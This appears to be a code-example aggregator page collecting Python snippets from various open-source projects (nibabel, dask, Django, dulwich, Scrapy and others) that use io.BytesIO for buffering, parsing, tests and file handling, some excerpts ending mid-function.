Exemple #1
0
def test_init():
    bio = BytesIO()
    shape = [2, 3, 4]
    dtype = np.int32
    arr = np.arange(24, dtype=dtype).reshape(shape)
    bio.seek(16)
    bio.write(arr.tostring(order='F'))
    hdr = FunkyHeader(shape)
    ap = ArrayProxy(bio, hdr)
    assert_true(ap.file_like is bio)
    assert_equal(ap.shape, shape)
    # shape should be read only
    assert_raises(AttributeError, setattr, ap, 'shape', shape)
    # Get the data
    assert_array_equal(np.asarray(ap), arr)
    # Check we can modify the original header without changing the ap version
    hdr.shape[0] = 6
    assert_not_equal(ap.shape, shape)
    # Data stays the same, also
    assert_array_equal(np.asarray(ap), arr)
    # C order also possible
    bio = BytesIO()
    bio.seek(16)
    bio.write(arr.tostring(order='C'))
    ap = CArrayProxy(bio, FunkyHeader((2, 3, 4)))
    assert_array_equal(np.asarray(ap), arr)
    # Illegal init
    assert_raises(TypeError, ArrayProxy, bio, object())
Exemple #2
0
def bytes_read_csv(b, header, kwargs, dtypes=None, columns=None):
    """ Convert a block of bytes to a Pandas DataFrame

    Parameters
    ----------
    b: bytestring
        The content to be parsed with pandas.read_csv
    header: bytestring
        An optional header to prepend to b
    kwargs: dict
        A dictionary of keyword arguments to be passed to pandas.read_csv
    dtypes: dict
        DTypes to assign to columns

    See Also:
        dask.dataframe.csv.read_csv_from_bytes
    """
    bio = BytesIO()
    if not b.startswith(header.rstrip()):
        bio.write(header)
    bio.write(b)
    bio.seek(0)
    df = pd.read_csv(bio, **kwargs)
    if dtypes:
        coerce_dtypes(df, dtypes)

    if columns and (list(df.columns) != list(columns)):
        raise ValueError("Columns do not match", df.columns, columns)
    return df
    def open(self, name, mode='rb'):
        resp = self.b2.download_file(name)

        output = BytesIO()
        output.write(resp)
        output.seek(0)
        return File(output, name)
Exemple #4
0
def test_tuplespec():
    bio = BytesIO()
    shape = [2, 3, 4]
    dtype = np.int32
    arr = np.arange(24, dtype=dtype).reshape(shape)
    bio.seek(16)
    bio.write(arr.tostring(order='F'))
    # Create equivalent header and tuple specs
    hdr = FunkyHeader(shape)
    tuple_spec = (hdr.get_data_shape(), hdr.get_data_dtype(),
                  hdr.get_data_offset(), 1., 0.)
    ap_header = ArrayProxy(bio, hdr)
    ap_tuple = ArrayProxy(bio, tuple_spec)
    # Header and tuple specs produce identical behavior
    for prop in ('shape', 'dtype', 'offset', 'slope', 'inter', 'is_proxy'):
        assert_equal(getattr(ap_header, prop), getattr(ap_tuple, prop))
    for method, args in (('get_unscaled', ()), ('__array__', ()),
                         ('__getitem__', ((0, 2, 1), ))
                         ):
        assert_array_equal(getattr(ap_header, method)(*args),
                           getattr(ap_tuple, method)(*args))
    # Tuple-defined ArrayProxies have no header to store
    with warnings.catch_warnings():
        assert_true(ap_tuple.header is None)
    # Partial tuples of length 2-4 are also valid
    for n in range(2, 5):
        ArrayProxy(bio, tuple_spec[:n])
    # Bad tuple lengths
    assert_raises(TypeError, ArrayProxy, bio, ())
    assert_raises(TypeError, ArrayProxy, bio, tuple_spec[:1])
    assert_raises(TypeError, ArrayProxy, bio, tuple_spec + ('error',))
    def test_read_atom(self):
        """Test that all fields are read from PDB ATOM records"""
        s = BytesIO()
        # PDB is fixed-format; we should be able to read coordinates even
        # without spaces between them
        s.write(b'ATOM      1  N   ALA A   5    3000.0001000.4002000.600'
                b'  2.00  6.40           N\n')
        s.seek(0)

        m = IMP.Model()
        pdb = IMP.atom.read_pdb(s, m)
        atoms = IMP.atom.get_by_type(pdb, IMP.atom.ATOM_TYPE)
        self.assertEqual(len(atoms), 1)
        a = IMP.atom.Atom(atoms[0])
        r = IMP.atom.Residue(a.get_parent())
        c = IMP.atom.Chain(r.get_parent())
        self.assertEqual(a.get_input_index(), 1)
        self.assertEqual(a.get_atom_type().get_string(), 'N')
        # Note: currently don't read alternate location or insertion code
        self.assertEqual(r.get_residue_type().get_string(), 'ALA')
        self.assertEqual(c.get_id(), 'A')
        self.assertEqual(r.get_index(), 5)
        coord = IMP.core.XYZ(a).get_coordinates()
        self.assertAlmostEqual(coord[0], 3000.000, delta=0.001)
        self.assertAlmostEqual(coord[1], 1000.400, delta=0.001)
        self.assertAlmostEqual(coord[2], 2000.600, delta=0.001)
        self.assertAlmostEqual(a.get_occupancy(), 2.00, delta=0.01)
        self.assertAlmostEqual(a.get_temperature_factor(), 6.40, delta=0.01)
Exemple #6
0
class FakePayload(object):
    """
    A wrapper around BytesIO that restricts what can be read since data from
    the network can't be seeked and cannot be read outside of its content
    length. This makes sure that views can't do anything under the test client
    that wouldn't work in Real Life.
    """
    def __init__(self, content=None):
        self.__content = BytesIO()
        self.__len = 0
        self.read_started = False
        if content is not None:
            self.write(content)

    def __len__(self):
        return self.__len

    def read(self, num_bytes=None):
        if not self.read_started:
            self.__content.seek(0)
            self.read_started = True
        if num_bytes is None:
            num_bytes = self.__len or 0
        assert self.__len >= num_bytes, "Cannot read more than the available bytes from the HTTP incoming data."
        content = self.__content.read(num_bytes)
        self.__len -= num_bytes
        return content

    def write(self, content):
        if self.read_started:
            raise ValueError("Unable to write a payload after he's been read")
        content = force_bytes(content)
        self.__content.write(content)
        self.__len += len(content)
Exemple #7
0
    def __init__(self, strings=()):
        self.strings = OrderedDict((s, 0) for s in strings)

        self.records = []
        offset = 0
        buf = BytesIO()
        for key in tuple(self.strings.iterkeys()):
            utf8 = utf8_text(key[:self.MAX_STRING_LENGTH])
            l = len(utf8)
            sz_bytes = encint(l)
            raw = sz_bytes + utf8
            if 0xfbf8 - buf.tell() < 6 + len(raw):
                # Records in PDB files cannot be larger than 0x10000, so we
                # stop well before that.
                pad = 0xfbf8 - buf.tell()
                buf.write(b'\0' * pad)
                self.records.append(buf.getvalue())
                buf.seek(0), buf.truncate(0)
                offset = len(self.records) * 0x10000
            buf.write(raw)
            self.strings[key] = offset
            offset += len(raw)

        val = buf.getvalue()
        if val:
            self.records.append(align_block(val))
Exemple #8
0
class ZippedStoreShaWriter(Sha1Writer):

    """Remembers everything someone writes to it and generates a sha"""
    __slots__ = ('buf', 'zip')

    def __init__(self):
        Sha1Writer.__init__(self)
        self.buf = BytesIO()
        self.zip = zlib.compressobj(zlib.Z_BEST_SPEED)

    def __getattr__(self, attr):
        return getattr(self.buf, attr)

    def write(self, data):
        alen = Sha1Writer.write(self, data)
        self.buf.write(self.zip.compress(data))

        return alen

    def close(self):
        self.buf.write(self.zip.flush())

    def seek(self, offset, whence=getattr(os, 'SEEK_SET', 0)):
        """Seeking currently only supports to rewind written data
        Multiple writes are not supported"""
        if offset != 0 or whence != getattr(os, 'SEEK_SET', 0):
            raise ValueError("Can only seek to position 0")
        # END handle offset
        self.buf.seek(0)

    def getvalue(self):
        """:return: string value from the current stream position to the end"""
        return self.buf.getvalue()
Exemple #9
0
def deserialize(schema, binary):
    bytes_writer = BytesIO()
    bytes_writer.write(binary)
    bytes_writer.seek(0)

    res = fastavro.schemaless_reader(bytes_writer, schema)
    return res
Exemple #10
0
def test_table_with_no_newline():
    """
    Test that an input file which is completely empty fails in the expected way.
    Test that an input file with one line but no newline succeeds.
    """
    # With guessing
    table = BytesIO()
    with pytest.raises(ascii.InconsistentTableError):
        ascii.read(table)

    # Without guessing
    table = BytesIO()
    with pytest.raises(ValueError) as err:
        ascii.read(table, guess=False, fast_reader=False, format='basic')
    assert 'No header line found' in str(err.value)

    table = BytesIO()
    with pytest.raises(ValueError) as err:
        ascii.read(table, guess=False, fast_reader=True, format='fast_basic')
    assert 'Inconsistent data column lengths' in str(err.value)

    # Put a single line of column names but with no newline
    for kwargs in [dict(),
                   dict(guess=False, fast_reader=False, format='basic'),
                   dict(guess=False, fast_reader=True, format='fast_basic')]:
        table = BytesIO()
        table.write(b'a b')
        t = ascii.read(table, **kwargs)
        assert t.colnames == ['a', 'b']
        assert len(t) == 0
Exemple #11
0
class ChunkBuffer:
    BUFFER_SIZE = 1 * 1024 * 1024

    def __init__(self, key, chunker_params=CHUNKER_PARAMS):
        self.buffer = BytesIO()
        self.packer = msgpack.Packer(unicode_errors='surrogateescape')
        self.chunks = []
        self.key = key
        self.chunker = Chunker(self.key.chunk_seed, *chunker_params)

    def add(self, item):
        self.buffer.write(self.packer.pack(StableDict(item)))
        if self.is_full():
            self.flush()

    def write_chunk(self, chunk):
        raise NotImplementedError

    def flush(self, flush=False):
        if self.buffer.tell() == 0:
            return
        self.buffer.seek(0)
        chunks = list(bytes(s) for s in self.chunker.chunkify(self.buffer))
        self.buffer.seek(0)
        self.buffer.truncate(0)
        # Leave the last partial chunk in the buffer unless flush is True
        end = None if flush or len(chunks) == 1 else -1
        for chunk in chunks[:end]:
            self.chunks.append(self.write_chunk(chunk))
        if end == -1:
            self.buffer.write(chunks[-1])

    def is_full(self):
        return self.buffer.tell() > self.BUFFER_SIZE
Exemple #12
0
class EchoLine(Connection):  # {{{

    bye_after_echo = False

    def connection_ready(self):
        self.rbuf = BytesIO()
        self.set_state(READ, self.read_line)

    def read_line(self, event):
        data = self.recv(1)
        if data:
            self.rbuf.write(data)
            if b"\n" == data:
                if self.rbuf.tell() < 3:
                    # Empty line
                    self.rbuf = BytesIO(b"bye" + self.rbuf.getvalue())
                    self.bye_after_echo = True
                self.set_state(WRITE, self.echo)
                self.rbuf.seek(0)

    def echo(self, event):
        pos = self.rbuf.tell()
        self.rbuf.seek(0, os.SEEK_END)
        left = self.rbuf.tell() - pos
        self.rbuf.seek(pos)
        sent = self.send(self.rbuf.read(512))
        if sent == left:
            self.rbuf = BytesIO()
            self.set_state(READ, self.read_line)
            if self.bye_after_echo:
                self.ready = False
        else:
            self.rbuf.seek(pos + sent)
Exemple #13
0
	def upload(self, path, filename,buffersize=None,callback=None, local_path=None):
		try:
			self.error = None
			#print('Upload = ' + path + filename)
			#print('Size = %.1f kB' % (os.path.getsize(filename) / 1024.0))
			#print('start upload')
			if local_path:
				file_obj = open(local_path+filename, 'rb')
			else:
				file_obj = open(filename, 'rb')
			offset = 0
			while True:
				if not buffersize:
					filesize = self.conn.storeFile(self.service_name, path+filename, file_obj)
					break
				else:	
					buffer_obj = file_obj.read(buffersize)			
					if buffer_obj:
						buffer_fileobj = BytesIO()
						buffer_fileobj.write(buffer_obj)
						buffer_fileobj.seek(0)
						offset_new = self.conn.storeFileFromOffset(self.service_name, path+filename, buffer_fileobj, offset=offset, truncate=False)
						#return the file position where the next byte will be written.
						offset = offset_new
						if callback:
							callback(offset)
					else:
						break
			file_obj.close()
			#print('upload finished')
		except Exception as e:
			if self.print_errors:
				print('Error on line {}'.format(sys.exc_info()[-1].tb_lineno), type(e).__name__, e)
			else:
				self.error = 'Error on line {}'.format(sys.exc_info()[-1].tb_lineno) + str(type(e).__name__) + str(e)
Exemple #14
0
def get_printable_message_args(msg, buff=None, prefix=''):
    """
    Get string representation of msg arguments
    :param msg: msg message to fill, ``Message``
    :param prefix: field name prefix (for verbose printing), ``str``
    :returns: printable representation of  msg args, ``str``
    """
    try:
        from cStringIO import StringIO # Python 2.x
        python3 = 0
    except ImportError:
        from io import BytesIO # Python 3.x
        python3 = 1

    if buff is None:
        if python3 == 1:
            buff = BytesIO()
        else: 
            buff = StringIO()
    for f in msg.__slots__:
        if isinstance(getattr(msg, f), Message):
            get_printable_message_args(getattr(msg, f), buff=buff, prefix=(prefix+f+'.'))
        else:
            buff.write(prefix+f+' ')
    return buff.getvalue().rstrip()
    def switch_xlog(self):
        self.log.debug("Switching xlog from %r amount of data: %r",
                       self.latest_wal, self.buffer.tell())

        self.buffer.seek(0)
        wal_data = BytesIO(self.buffer.read(XLOG_SEG_SIZE))
        wal_data.seek(0, os.SEEK_END)
        padding = XLOG_SEG_SIZE - wal_data.tell()
        # Pad with 0s up to XLOG_SEG_SIZE
        wal_data.write(padding * b"\0")
        wal_data.seek(0)
        callback_queue = Queue()
        self.callbacks[self.latest_wal_start] = callback_queue

        compression_event = {
            "type": "CLOSE_WRITE",
            "callback_queue": callback_queue,
            "compress_to_memory": True,
            "delete_file_after_compression": False,
            "input_data": wal_data,
            "full_path": self.latest_wal,
            "site": self.site,
        }
        self.latest_wal = None
        self.compression_queue.put(compression_event)

        rest_of_data = self.buffer.read()
        assert len(rest_of_data) == 0
        self.buffer = BytesIO(rest_of_data)
        self.buffer.seek(0, os.SEEK_END)
Exemple #16
0
    def test_send_attach(self):
        attach = BytesIO()
        attach.write(b'content')
        attach.seek(0)
        attachs = [('attachment', 'text/plain', attach)]

        mailsender = MailSender(debug=True)
        mailsender.send(to=['*****@*****.**'], subject='subject', body='body',
                       attachs=attachs, _callback=self._catch_mail_sent)

        assert self.catched_msg
        self.assertEqual(self.catched_msg['to'], ['*****@*****.**'])
        self.assertEqual(self.catched_msg['subject'], 'subject')
        self.assertEqual(self.catched_msg['body'], 'body')

        msg = self.catched_msg['msg']
        self.assertEqual(msg['to'], '*****@*****.**')
        self.assertEqual(msg['subject'], 'subject')

        payload = msg.get_payload()
        assert isinstance(payload, list)
        self.assertEqual(len(payload), 2)

        text, attach = payload
        self.assertEqual(text.get_payload(decode=True), b'body')
        self.assertEqual(text.get_charset(), Charset('us-ascii'))
        self.assertEqual(attach.get_payload(decode=True), b'content')
Exemple #17
0
    def test_send_attach_utf8(self):
        subject = u'sübjèçt'
        body = u'bödÿ-àéïöñß'
        attach = BytesIO()
        attach.write(body.encode('utf-8'))
        attach.seek(0)
        attachs = [('attachment', 'text/plain', attach)]

        mailsender = MailSender(debug=True)
        mailsender.send(to=['*****@*****.**'], subject=subject, body=body,
                        attachs=attachs, charset='utf-8', _callback=self._catch_mail_sent)

        assert self.catched_msg
        self.assertEqual(self.catched_msg['subject'], subject)
        self.assertEqual(self.catched_msg['body'], body)

        msg = self.catched_msg['msg']
        self.assertEqual(msg['subject'], subject)
        self.assertEqual(msg.get_charset(), Charset('utf-8'))
        self.assertEqual(msg.get('Content-Type'), 'multipart/mixed; charset="utf-8"')

        payload = msg.get_payload()
        assert isinstance(payload, list)
        self.assertEqual(len(payload), 2)

        text, attach = payload
        self.assertEqual(text.get_payload(decode=True).decode('utf-8'), body)
        self.assertEqual(text.get_charset(), Charset('utf-8'))
        self.assertEqual(attach.get_payload(decode=True).decode('utf-8'), body)
Exemple #18
0
    def do_install(self, name, data):
        if name in data:
            utils.makedirs(self.output_dir)
            LOGGER.notice('Downloading: ' + data[name])
            zip_file = BytesIO()
            zip_file.write(requests.get(data[name]).content)
            LOGGER.notice('Extracting: {0} into themes'.format(name))
            utils.extract_all(zip_file)
            dest_path = os.path.join('themes', name)
        else:
            try:
                theme_path = utils.get_theme_path(name)
            except:
                LOGGER.error("Can't find theme " + name)
                return False

            utils.makedirs(self.output_dir)
            dest_path = os.path.join(self.output_dir, name)
            if os.path.exists(dest_path):
                LOGGER.error("{0} is already installed".format(name))
                return False

            LOGGER.notice('Copying {0} into themes'.format(theme_path))
            shutil.copytree(theme_path, dest_path)
        confpypath = os.path.join(dest_path, 'conf.py.sample')
        if os.path.exists(confpypath):
            LOGGER.notice('This plugin has a sample config file.')
            print('Contents of the conf.py.sample file:\n')
            with codecs.open(confpypath, 'rb', 'utf-8') as fh:
                print(indent(pygments.highlight(
                    fh.read(), PythonLexer(), TerminalFormatter()), 4 * ' '))
            return True
    class TCP:
        port = 80
        disconnected = False

        def __init__(self):
            self.written = BytesIO()
            self.producers = []

        def getPeer(self):
            return IPv4Address("TCP", '192.168.1.1', 12344)

        def write(self, data):
            if not isinstance(data, bytes):
                raise TypeError("Can only write bytes to a transport, not %r" % (data,))
            self.written.write(data)

        def writeSequence(self, iovec):
            for data in iovec:
                self.write(data)

        def getHost(self):
            return IPv4Address("TCP", '10.0.0.1', self.port)

        def registerProducer(self, producer, streaming):
            self.producers.append((producer, streaming))

        def unregisterProducer(self):
            pass

        def loseConnection(self):
            self.disconnected = True
Exemple #20
0
    def write(self, data):
        """Appends data to buffer"""
        available_before = self.available

        # trim data if limit expected
        has_limit = self.buffer_limit is not None
        if has_limit and ((len(data) + self.available) > self.buffer_limit):
            data = data[: self.buffer_limit - self.available]

        if self.size < self.available + len(data):
            # Expand buffer
            new_buf = BytesIO()
            new_buf.write(self.read())
            self.write_fp = self.available = new_buf.tell()
            read_fp = 0
            while self.size <= self.available + len(data):
                self.size = max(self.size, 1024) * 2
            new_buf.write("0" * (self.size - self.write_fp))
            self.buf = new_buf
        else:
            read_fp = self.buf.tell()

        self.buf.seek(self.write_fp)
        written = self.size - self.write_fp
        self.buf.write(data[:written])
        self.write_fp += len(data)
        self.available += len(data)
        if written < len(data):
            self.write_fp -= self.size
            self.buf.seek(0)
            self.buf.write(data[written:])
        self.buf.seek(read_fp)

        return self.available - available_before
Exemple #21
0
def export():
    '''Export the search results as CSV file'''
    try:
        if 'query' not in request.json:
            query = Query.from_string(request.json.get('search_string', ''), return_type='csv')
        else:
            query = Query.from_json(request.json['query'])
    except ValueError:
        abort(400)

    try:
        offset = int(request.json.get('offset', '0'))
    except ValueError:
        offset = 0

    try:
        paginate = int(request.json.get('paginate', '0'))
    except ValueError:
        paginate = 0

    return_type = query.return_type
    search_type = query.search_type

    if return_type not in ('json', 'csv', 'fasta', 'fastaa'):
        abort(400)

    search_results = core_search(query)
    g.verbose = query.verbose
    if query.verbose:
        g.search_str = str(query)

    total = len(search_results)

    if paginate > 0:
        end = min(offset + paginate, total)
    else:
        end = total

    search_results = search_results[offset:end]

    limit = FASTA_LIMITS.get(search_type, 100)

    if return_type.startswith('fasta') and len(search_results) > limit:
        raise TooManyResults('More than {limit} search results for FASTA {search} download ({number} found), please specify a smaller query.'.format(
            limit=limit, search=search_type, number=len(search_results)))

    found_bgcs = format_results(query, search_results)
    filename = 'asdb_search_results.{}'.format(return_type)
    if query.return_type == 'json':
        found_bgcs = [json.dumps(found_bgcs)]

    handle = BytesIO()
    for line in found_bgcs:
        handle.write('{}\n'.format(line).encode('utf-8'))

    handle.seek(0)

    mime_type = MIME_TYPE_MAP.get(query.return_type, None)

    return send_file(handle, mimetype=mime_type, attachment_filename=filename, as_attachment=True)
Exemple #22
0
class Tee(RawIOBase):
    def __init__(self, source):
        self.source = source
        self.buf = BytesIO()

    def __iter__(self):
        for line in self.source:
            self.buf.write(line)
            yield line

    def __enter__(self):
        return self

    def __exit__(self, typ, val, tb):
        self.close()

    def close(self):
        self.source.close()
        self.buf = None

    @property
    def closed(self):
        return self.source.closed

    def read(self, size=None):
        b = self.source.read(size)
        self.buf.write(b)
        return b
Exemple #23
0
    def read(self, fh, offset, length):
        '''Read `size` bytes from `fh` at position `off`

        Unless EOF is reached, returns exactly `size` bytes.

        This method releases the global lock while it is running.
        '''
        #log.debug('started with %d, %d, %d', fh, offset, length)
        buf = BytesIO()
        inode = self.inodes[fh]

        # Make sure that we don't read beyond the file size. This
        # should not happen unless direct_io is activated, but it's
        # cheap and nice for testing.
        size = inode.size
        length = min(size - offset, length)

        while length > 0:
            tmp = self._readwrite(fh, offset, length=length)
            buf.write(tmp)
            length -= len(tmp)
            offset += len(tmp)

        # Inode may have expired from cache
        inode = self.inodes[fh]

        if inode.atime < inode.ctime or inode.atime < inode.mtime:
            inode.atime = time.time()

        return buf.getvalue()
Exemple #24
0
    def test_update_object_and_get_through_store_should_get_identical_bytestream(self):

        # create file
        storage_factory = PairtreeStorageFactory()
        store = storage_factory.get_store(store_dir=self.data_dir, uri_base="http://dummy")
        id = u'owërdœ.file'
        object = store.create_object(id)
        with open(self.test_file_path, 'rb') as test_file:
            object.add_bytestream('dummy.txt', test_file)

        # update file
        handle_large_file_2 = BytesIO()
        handle_large_file_2.write(b'baz')
        handle_large_file_2.seek(0)
        object.add_bytestream('dummy.txt', handle_large_file_2)

        handle_large_file_2.close()

        # create check
        string_io_container = BytesIO()
        string_io_container.write(b'baz')

        retreived_bytestream = object.get_bytestream('dummy.txt')
        orig_hash = hashlib.md5(string_io_container.getvalue()).hexdigest()
        created_hash = hashlib.md5(retreived_bytestream).hexdigest()

        self.assertEqual(orig_hash, created_hash)
Exemple #25
0
class Msgunfmt(Command):
    CHARSET_RE = re.compile(rb'^"Content-Type: [^;]+; charset=([^\\]+)\\n"$')

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self._header = BytesIO()
        self._encoding = None

    @tool_required('msgunfmt')
    def cmdline(self):
        return ['msgunfmt', self.path]

    def filter(self, line):
        if not self._encoding:
            self._header.write(line)
            if line == b'\n':
                logger.debug("unable to determine PO encoding, let's hope it's utf-8")
                self._encoding = 'utf-8'
                return self._header.getvalue()
            found = Msgunfmt.CHARSET_RE.match(line)
            if found:
                self._encoding = found.group(1).decode('us-ascii').lower()
                return self._header.getvalue().decode(self._encoding).encode('utf-8')
            return b''
        if self._encoding != 'utf-8':
            return line.decode(self._encoding).encode('utf-8')
        else:
            return line
Exemple #26
0
def get_buffer_and_cam(row, cid, gmt):
    """Get things"""
    if row['scrape_url'] is None:
        cam = vbcam.get_vbcam(cid)
        cam.retries = 2

        # Get Still
        buf = BytesIO()
        buf.write(cam.get_one_shot())
        buf.seek(0)

    else:
        buf, cam = None, None
        """
        url = row['scrape_url']
        req = urllib2.Request(url)
        try:
            req2 = urllib2.urlopen(req)
        except Exception as exp:
            if NOW.minute == 0:
                print('Exception for %s: %s' % (cid, exp))
            return
        modified = req2.info().getheader('Last-Modified')
        if modified:
            gmt = datetime.datetime.strptime(modified,
                                             "%a, %d %b %Y %H:%M:%S %Z")
            now = gmt + datetime.timedelta(seconds=NOW.utcoffset().seconds)
            # Round up to nearest 5 minute bin
            roundup = 5 - now.minute % 5
            gmt += datetime.timedelta(minutes=roundup)
        buf = StringIO.StringIO(req2.read())
        buf.seek(0)
        """
    return buf, cam, gmt
class OutputStreamWrapper(unohelper.Base, XOutputStream):
    """ Minimal Implementation of XOutputStream """
    def __init__(self, debug=True):
        self.debug = debug
        self.data = BytesIO()
        self.position = 0
        if self.debug:
            sys.stderr.write("__init__ OutputStreamWrapper.\n")

    def writeBytes(self, bytes):
        if self.debug:
            sys.stderr.write("writeBytes %i bytes.\n" % len(bytes.value))
        self.data.write(bytes.value)
        self.position += len(bytes.value)

    def close(self):
        if self.debug:
            sys.stderr.write("Closing output. %i bytes written.\n" % self.position)
        self.data.close()

    def flush(self):
        if self.debug:
            sys.stderr.write("Flushing output.\n")
        pass
    def closeOutput(self):
        if self.debug:
            sys.stderr.write("Closing output.\n")
        pass
Exemple #28
0
    def from_json(self, payload):
        """
        Read and decode the HTTP request payload, seen as a
        JSON string, into a python object.
        """

        buffer = BytesIO()

        # TODO: Can this be refactored into an iter() w/ sentinel?

        while True:
            try:
                chunk = yield from payload.read()
                if chunk is b'':
                    break
                buffer.write(chunk)
            except EofStream:
                break

        try:
            return json.loads(buffer.getvalue().decode('UTF-8'))
        except (TypeError, ValueError):
            self.logger.error('Invalid JSON payload from client \'{}\'.'
                              .format(self.client))
            yield from \
                self.respond('Request payload contains malformed JSON content.',
                             400)
Exemple #29
0
    def Generate(self, File=None):
        Buffer = BytesIO()
        if len(self.PostfixNotation) == 0:
            return False

        for Item in self.PostfixNotation:
            if Item in self.Opcode[self.Phase]:
                Buffer.write(pack("B", self.Opcode[self.Phase][Item]))
            elif Item in self.SupportedOpcode:
                EdkLogger.error("GenDepex", FORMAT_INVALID,
                                "Opcode [%s] is not expected in %s phase" % (Item, self.Phase),
                                ExtraData=self.ExpressionString)
            else:
                Buffer.write(self.GetGuidValue(Item))

        FilePath = ""
        FileChangeFlag = True
        if File is None:
            sys.stdout.write(Buffer.getvalue())
            FilePath = "STDOUT"
        else:
            FileChangeFlag = SaveFileOnChange(File, Buffer.getvalue(), True)

        Buffer.close()
        return FileChangeFlag
Exemple #30
0
def dumpIO_source(object, **kwds):
    """write object source to a buffer (instead of dill.dump)
Loads by with dill.temp.loadIO_source.  Returns the buffer object.

    >>> f = lambda x:x**2
    >>> pyfile = dill.temp.dumpIO_source(f, alias='_f')
    >>> _f = dill.temp.loadIO_source(pyfile)
    >>> _f(4)
    16

Optional kwds:
    If 'alias' is specified, the object will be renamed to the given string.
    """
    from .source import importable, getname
    if PY3:
        from io import BytesIO as StringIO
    else:
        from StringIO import StringIO
    alias = kwds.pop('alias', '') #XXX: include an alias so a name is known
    name = str(alias) or getname(object)
    name = "\n#NAME: %s\n" % name
    #XXX: assumes kwds['dir'] is writable and on $PYTHONPATH
    file = StringIO()
    file.write(b(''.join([importable(object, alias=alias),name])))
    file.flush()
    return file
Exemple #31
0
 def do_POST(self):
     """Serve a POST request."""
     r, info = self.deal_post_data()
     print((r, info, "by: ", self.client_address))
     f = BytesIO()
     f.write(b'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
     f.write(b"<html>\n<title>Upload Result Page</title>\n")
     f.write(b"<body>\n<h2>Upload Result Page</h2>\n")
     f.write(b"<hr>\n")
     if r:
         f.write(b"<strong>Success:</strong>")
     else:
         f.write(b"<strong>Failed:</strong>")
     f.write(info.encode())
     f.write(
         ("<br><a href=\"%s\">back</a>" % self.headers['referer']).encode())
     f.write(b"here</a>.</small></body>\n</html>\n")
     length = f.tell()
     f.seek(0)
     self.send_response(200)
     self.send_header("Content-type", "text/html")
     self.send_header("Content-Length", str(length))
     self.end_headers()
     if f:
         self.copyfile(f, self.wfile)
         f.close()
Exemple #32
0
class BufferedRandomReader:
    """Create random-access, read-only buffered stream adapter from a sequential
    input stream which does not support random access (i.e., ```seek()```)

    Example::

        >>> stream = BufferedRandomReader(BytesIO('abc'))
        >>> print stream.read(2)
        ab
        >>> stream.seek(0)
        0L
        >>> print stream.read()
        abc

    """
    def __init__(self, fin, chunk_size=512):
        self._fin = fin
        self._buf = BytesIO()
        self._eof = False
        self._chunk_size = chunk_size

    def tell(self):
        return self._buf.tell()

    def read(self, n=-1):
        """Read at most ``n`` bytes from the file (less if the ```read``` hits
        end-of-file before obtaining size bytes).

        If ``n`` argument is negative or omitted, read all data until end of
        file is reached. The bytes are returned as a string object. An empty
        string is returned when end of file is encountered immediately.
        """
        pos = self._buf.tell()
        end = self._buf.seek(0, SEEK_END)

        if n < 0:
            if not self._eof:
                self._buf.write(self._fin.read())
                self._eof = True
        else:
            req = pos + n - end

            if req > 0 and not self._eof:  # need to grow
                bcount = _align_up(req, self._chunk_size)
                bytes = self._fin.read(bcount)

                self._buf.write(bytes)
                self._eof = len(bytes) < bcount

        self._buf.seek(pos)

        return self._buf.read(n)

    def seek(self, offset, whence=SEEK_SET):

        if whence == SEEK_END:
            if not self._eof:
                self._buf.seek(0, SEEK_END)
                self._buf.write(self._fin.read())
                self._eof = True
            return self._buf.seek(offset, SEEK_END)

        return self._buf.seek(offset, whence)

    def close(self):
        self._fin.close()
        self._buf.close()
Exemple #33
0
class GitClientTests(TestCase):

    def setUp(self):
        super(GitClientTests, self).setUp()
        self.rout = BytesIO()
        self.rin = BytesIO()
        self.client = DummyClient(lambda x: True, self.rin.read,
                                  self.rout.write)

    def test_caps(self):
        agent_cap = (
            'agent=dulwich/%d.%d.%d' % dulwich.__version__).encode('ascii')
        self.assertEqual(set([b'multi_ack', b'side-band-64k', b'ofs-delta',
                              b'thin-pack', b'multi_ack_detailed', b'shallow',
                              agent_cap]),
                         set(self.client._fetch_capabilities))
        self.assertEqual(
            set([b'delete-refs', b'ofs-delta', b'report-status',
                 b'side-band-64k', agent_cap]),
            set(self.client._send_capabilities))

    def test_archive_ack(self):
        self.rin.write(
            b'0009NACK\n'
            b'0000')
        self.rin.seek(0)
        self.client.archive(b'bla', b'HEAD', None, None)
        self.assertEqual(self.rout.getvalue(), b'0011argument HEAD0000')

    def test_fetch_empty(self):
        self.rin.write(b'0000')
        self.rin.seek(0)

        def check_heads(heads):
            self.assertEqual(heads, {})
            return []
        ret = self.client.fetch_pack(b'/', check_heads, None, None)
        self.assertEqual({}, ret.refs)
        self.assertEqual({}, ret.symrefs)

    def test_fetch_pack_ignores_magic_ref(self):
        self.rin.write(
            b'00000000000000000000000000000000000000000000 capabilities^{}'
            b'\x00 multi_ack '
            b'thin-pack side-band side-band-64k ofs-delta shallow no-progress '
            b'include-tag\n'
            b'0000')
        self.rin.seek(0)

        def check_heads(heads):
            self.assertEqual({}, heads)
            return []
        ret = self.client.fetch_pack(b'bla', check_heads, None, None, None)
        self.assertEqual({}, ret.refs)
        self.assertEqual({}, ret.symrefs)
        self.assertEqual(self.rout.getvalue(), b'0000')

    def test_fetch_pack_none(self):
        self.rin.write(
            b'008855dcc6bf963f922e1ed5c4bbaaefcfacef57b1d7 HEAD\x00multi_ack '
            b'thin-pack side-band side-band-64k ofs-delta shallow no-progress '
            b'include-tag\n'
            b'0000')
        self.rin.seek(0)
        ret = self.client.fetch_pack(
                b'bla', lambda heads: [], None, None, None)
        self.assertEqual(
                {b'HEAD': b'55dcc6bf963f922e1ed5c4bbaaefcfacef57b1d7'},
                ret.refs)
        self.assertEqual({}, ret.symrefs)
        self.assertEqual(self.rout.getvalue(), b'0000')

    def test_send_pack_no_sideband64k_with_update_ref_error(self):
        # No side-bank-64k reported by server shouldn't try to parse
        # side band data
        pkts = [b'55dcc6bf963f922e1ed5c4bbaaefcfacef57b1d7 capabilities^{}'
                b'\x00 report-status delete-refs ofs-delta\n',
                b'',
                b"unpack ok",
                b"ng refs/foo/bar pre-receive hook declined",
                b'']
        for pkt in pkts:
            if pkt == b'':
                self.rin.write(b"0000")
            else:
                self.rin.write(("%04x" % (len(pkt)+4)).encode('ascii') + pkt)
        self.rin.seek(0)

        tree = Tree()
        commit = Commit()
        commit.tree = tree
        commit.parents = []
        commit.author = commit.committer = b'test user'
        commit.commit_time = commit.author_time = 1174773719
        commit.commit_timezone = commit.author_timezone = 0
        commit.encoding = b'UTF-8'
        commit.message = b'test message'

        def update_refs(refs):
            return {b'refs/foo/bar': commit.id, }

